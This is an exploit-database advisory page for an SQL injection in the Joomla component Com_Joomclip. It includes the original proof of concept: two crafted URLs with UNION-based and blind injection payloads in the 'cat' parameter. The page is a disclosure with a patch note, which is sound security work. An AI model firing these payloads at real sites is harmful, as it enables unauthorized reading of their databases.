header-logo
Suggest Exploit
vendor:
Com_Joomclip
by:
599eme Man
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Com_Joomclip
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component Com_Joomclip (cat) SQL injection

A SQL injection vulnerability exists in the Joomla Component Com_Joomclip (cat) which allows an attacker to execute arbitrary SQL commands on the vulnerable system. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable system. The vulnerable parameter is ‘cat’ which is used in the ‘view=thumbs’ parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable system. The vulnerable parameter is ‘cat’ which is used in the ‘view=thumbs’ parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________


# [+] Joomla Component Com_Joomclip (cat) SQL injection
#
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
#
#[------------------------------------------------------------------------------------]
#
# [+] SQL
# 
# 	http://server/index.php?option=com_joomclip&view=thumbs&cat=20%20union%20all%20select%201,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
# 
# [+] Blind
# 
#  	http://server/index.php?option=com_joomclip&view=thumbs&cat=20%20and%20substring%28@@version,1,1%29=4
# 
#[------------------------------------------------------------------------------------]